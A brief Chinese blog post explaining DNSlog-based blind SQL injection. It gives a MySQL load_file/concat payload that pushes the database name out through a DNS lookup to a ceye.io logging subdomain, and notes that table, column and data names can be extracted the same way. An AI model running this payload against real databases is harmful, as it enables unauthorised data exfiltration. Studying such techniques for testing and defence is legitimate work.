前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。
可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。
用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\\\’,database(),’.xxxx.ceye.io\\fwafw’)); 这个就相当于访问了table_schema.xxxx.ceye.io , 这个时候就会在记录上显示出来 table_schema。由于load_file()访问的是文件,所以 就要加上 \\\ ,可以在网页上试试, 它会显示的是file\\\xxxxx 。.io\\ 后面的 可以是任意的东西这里就是wafw 。然后用concat 来把 \\\database() 和 二级域名连接。
然后类似的就使用 常规的注入来得到表名,列名,数据等
dnslog的sql注入
最新推荐文章于 2025-05-19 00:29:18 发布